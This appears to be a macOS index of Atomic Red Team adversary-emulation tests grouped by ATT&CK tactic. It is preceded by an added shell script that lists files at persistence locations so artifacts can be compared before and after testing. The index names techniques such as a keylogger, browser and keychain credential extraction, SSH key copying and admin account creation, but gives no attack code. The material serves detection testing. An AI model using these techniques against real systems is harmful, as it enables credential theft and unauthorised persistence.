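# Added example (not an Atomic Red Team test): enumerate the macOS persistence
# locations written to by the tests in this section of the index.
# Usage: list_persistence_artifacts [ROOT] [USER_HOME]
#   ROOT      filesystem root to inspect (default /)
#   USER_HOME home directory for the per-user locations (default $HOME)
# Output: one line per existing file, "<ATT&CK ID><tab><path>".

list_persistence_artifacts() {
  root=${1:-/}
  home=${2:-$HOME}
  # Table of "ID|glob" pairs. Globs starting with ~ are per-user and are
  # rebased onto $home; all others are rebased onto $root. The mapping of IDs
  # to paths follows the test names in this index and is my annotation.
  while IFS='|' read -r tid pattern; do
    [ -n "$tid" ] || continue
    case $pattern in
      '~'*) pattern="$home${pattern#\~}" ;;
      *)    pattern="${root%/}$pattern" ;;
    esac
    # Unquoted expansion performs the glob; a glob with no match stays literal
    # and fails the -e check, so empty directories are silently skipped.
    for f in $pattern; do
      if [ -e "$f" ]; then
        printf '%s\t%s\n' "$tid" "$f"
      fi
    done
  done <<'EOF'
T1543.001|/Library/LaunchAgents/*.plist
T1543.001|~/Library/LaunchAgents/*.plist
T1543.004|/Library/LaunchDaemons/*.plist
T1037.005|/Library/StartupItems/*
T1037.004|/etc/rc.common
T1546.014|/etc/emond.d/rules/*.plist
T1053.003|/usr/lib/cron/tabs/*
T1546.004|~/.bash_profile
T1546.004|~/.bashrc
T1098.004|~/.ssh/authorized_keys
T1037.002|~/Library/Preferences/com.apple.loginwindow.plist
T1547.007|~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist
EOF
}

main() {
  list_persistence_artifacts "${1:-/}" "${2:-$HOME}"
}

main "$@"
```

Snapshot the output before running the atomics, again afterwards, and diff the two; any line in the second snapshot that is absent from the first is an artifact the test left behind. Presence of a file is only the first signal: `/etc/rc.common`, `~/.bashrc` and a populated `authorized_keys` exist legitimately on many systems, so compare contents (or hashes) between snapshots rather than treating the path alone as an indicator.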
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #4: Tor Proxy Usage - MacOS [macos]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #3: using Quicktime Player [macos]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1514 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #7: MacOS Swift Keylogger [macos]
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.001 Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #3: Extract passwords with grep [macos, linux]
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- Atomic Test #7: Enumerate users and groups [macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #7: Examine password policy - macOS [macos]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
